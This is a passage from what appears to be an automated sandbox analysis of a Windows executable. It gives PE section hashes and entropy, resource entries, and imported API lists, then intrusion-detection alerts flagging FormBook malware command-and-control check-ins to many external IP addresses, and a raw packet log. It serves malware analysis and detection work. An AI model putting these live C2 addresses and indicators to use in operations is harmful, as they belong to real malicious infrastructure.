                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000x615d0x62000b0812166ebbd0109e7f5e007b182949False0.6616709183673469data6.450231726170125IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0xa0000x203380x60066b45fceba0f24d768fb09e0afe23c99False0.5026041666666666data3.9824009583068882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .ndata0x2b0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .rsrc0x4f0000x24bf80x24c00d03da8dabf58037657a90c0af0ddc01aFalse0.910601349914966data7.7757226718352515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_BITMAP0x4f4c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                                                                                        RT_ICON0x4f8280x132a8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9996305920717415
                                                                                                                                                                                                                        RT_ICON0x62ad00x7a37PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9927765525617669
                                                                                                                                                                                                                        RT_ICON0x6a5080x2967PNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9979243324841967
                                                                                                                                                                                                                        RT_ICON0x6ce700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5449170124481327
                                                                                                                                                                                                                        RT_ICON0x6f4180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6078799249530957
                                                                                                                                                                                                                        RT_ICON0x704c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.6735074626865671
                                                                                                                                                                                                                        RT_ICON0x713680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7842960288808665
                                                                                                                                                                                                                        RT_ICON0x71c100x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.47621951219512193
                                                                                                                                                                                                                        RT_ICON0x722780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7059248554913294
                                                                                                                                                                                                                        RT_ICON0x727e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7180851063829787
                                                                                                                                                                                                                        RT_ICON0x72c480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5752688172043011
                                                                                                                                                                                                                        RT_ICON0x72f300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.7601351351351351
                                                                                                                                                                                                                        RT_DIALOG0x730580x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                                                                                        RT_DIALOG0x731a00x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                                                                                        RT_DIALOG0x732e00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                        RT_DIALOG0x733e00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                        RT_DIALOG0x735000xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                                                        RT_DIALOG0x735c80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                        RT_GROUP_ICON0x736280xaedataEnglishUnited States0.6091954022988506
                                                                                                                                                                                                                        RT_VERSION0x736d80x1dcdataEnglishUnited States0.5462184873949579
                                                                                                                                                                                                                        RT_MANIFEST0x738b80x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153
                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                                                                                                        ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                        2024-10-23T18:51:19.383533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982784.32.84.3280TCP
                                                                                                                                                                                                                        2024-10-23T18:51:19.383533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982684.32.84.3280TCP
                                                                                                                                                                                                                        2024-10-23T18:51:19.383533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204985113.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:51:19.383533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982584.32.84.3280TCP
                                                                                                                                                                                                                        2024-10-23T18:51:19.383533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204985613.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:51:19.383533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979513.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:52:50.053174+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049790142.250.80.110443TCP
                                                                                                                                                                                                                        2024-10-23T18:53:27.587484+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204979262.149.128.4580TCP
                                                                                                                                                                                                                        2024-10-23T18:53:42.971637+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979313.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:53:45.609684+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979413.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:53:50.892144+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204979613.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:53:57.676301+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049797162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:00.237051+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049798162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:02.607980+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049799162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:04.433105+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049800162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:09.821854+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498013.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:54:12.462609+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498023.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:54:15.101866+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498033.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:54:17.741445+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498043.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:54:23.267014+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:54:25.913453+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049806162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:54:28.584202+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049807162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:54:31.293807+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049808162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:54:41.785148+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:44.531622+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049810185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:47.254941+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049811185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:49.965592+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049812185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:55.538176+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049813172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:54:58.170346+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049814172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:55:00.799106+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049815172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:55:03.422881+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049816172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:55:08.801289+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498173.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:11.433913+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498183.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:14.079310+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498193.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:19.657726+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498203.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:25.031464+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498213.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:27.664048+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498223.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:30.305888+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498233.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:39.987989+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498243.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:55:54.297714+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204982884.32.84.3280TCP
                                                                                                                                                                                                                        2024-10-23T18:55:59.813650+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982975.2.19.6280TCP
                                                                                                                                                                                                                        2024-10-23T18:56:02.436659+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983075.2.19.6280TCP
                                                                                                                                                                                                                        2024-10-23T18:56:05.067883+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983175.2.19.6280TCP
                                                                                                                                                                                                                        2024-10-23T18:56:07.689775+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983275.2.19.6280TCP
                                                                                                                                                                                                                        2024-10-23T18:56:13.195147+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049833172.67.177.22080TCP
                                                                                                                                                                                                                        2024-10-23T18:56:15.820761+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049834172.67.177.22080TCP
                                                                                                                                                                                                                        2024-10-23T18:56:18.430226+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049835172.67.177.22080TCP
                                                                                                                                                                                                                        2024-10-23T18:56:21.046825+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049836172.67.177.22080TCP
                                                                                                                                                                                                                        2024-10-23T18:56:26.822030+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049837104.21.64.12480TCP
                                                                                                                                                                                                                        2024-10-23T18:56:29.477516+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049838104.21.64.12480TCP
                                                                                                                                                                                                                        2024-10-23T18:56:32.102884+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049839104.21.64.12480TCP
                                                                                                                                                                                                                        2024-10-23T18:56:34.711326+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049840104.21.64.12480TCP
                                                                                                                                                                                                                        2024-10-23T18:56:40.179763+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049841142.251.40.24380TCP
                                                                                                                                                                                                                        2024-10-23T18:56:42.823665+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049842142.251.40.24380TCP
                                                                                                                                                                                                                        2024-10-23T18:56:45.463629+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049843142.251.40.24380TCP
                                                                                                                                                                                                                        2024-10-23T18:56:48.032751+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049844142.251.40.24380TCP
                                                                                                                                                                                                                        2024-10-23T18:56:54.192355+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049845194.58.112.17480TCP
                                                                                                                                                                                                                        2024-10-23T18:56:57.541462+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049846194.58.112.17480TCP
                                                                                                                                                                                                                        2024-10-23T18:56:59.772431+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049847194.58.112.17480TCP
                                                                                                                                                                                                                        2024-10-23T18:57:02.529322+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049848194.58.112.17480TCP
                                                                                                                                                                                                                        2024-10-23T18:57:08.084013+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984913.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:57:10.725195+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204985013.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:57:16.002328+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204985213.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:57:24.477655+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204985362.149.128.4580TCP
                                                                                                                                                                                                                        2024-10-23T18:57:29.702585+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204985413.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:57:32.344731+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204985513.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:57:37.623172+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204985713.248.169.4880TCP
                                                                                                                                                                                                                        2024-10-23T18:57:42.986321+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049858162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:57:45.658257+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049859162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:57:48.352990+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049860162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:57:51.034736+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049861162.0.231.20380TCP
                                                                                                                                                                                                                        2024-10-23T18:57:56.259506+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498623.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:57:58.902428+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498633.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:58:02.443439+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498643.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:58:05.193260+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498653.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:58:10.525554+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049866162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:58:13.196161+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049867162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:58:15.813986+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049868162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:58:18.604684+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049869162.241.63.7780TCP
                                                                                                                                                                                                                        2024-10-23T18:58:28.972554+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049870185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:31.708352+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049871185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:34.443490+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049872185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:37.166871+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049873185.134.245.11380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:42.608482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049874172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:45.272826+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049875172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:47.875961+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049876172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:50.496361+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049877172.67.148.13380TCP
                                                                                                                                                                                                                        2024-10-23T18:58:56.612400+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498783.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:58:58.355482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498793.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:00.996705+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498803.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:06.546231+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498813.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:11.781952+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498823.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:14.417558+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498833.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T18:59:17.961772+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498843.33.130.19080TCP
                                                                                                                                                                                                                        2024-10-23T19:00:19.713956+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498853.33.130.19080TCP
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.593128920 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.593209982 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.593410969 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.630158901 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.630181074 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.838773966 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.838893890 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.838948011 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.839807987 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.840058088 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.896146059 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.896157026 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.896424055 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.896579981 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.899187088 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.940085888 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.053210020 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.053344965 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.053423882 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.053579092 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.054481983 CEST49790443192.168.11.20142.250.80.110
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.054502964 CEST44349790142.250.80.110192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.179637909 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.179661036 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.179827929 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.180155993 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.180167913 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.397191048 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.397588015 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.401179075 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.401231050 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.401897907 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.402089119 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.402502060 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.444030046 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.721441984 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.721637964 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.721638918 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.721796036 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.734776974 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.735018015 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.741705894 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.742017984 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.748332024 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.748572111 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.748622894 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.748847961 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.815550089 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.815838099 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.815850973 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.816050053 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.819205999 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.819442034 CEST49791443192.168.11.20142.250.176.193
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.819498062 CEST44349791142.250.176.193192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:52.819785118 CEST49791443192.168.11.20142.250.176.193
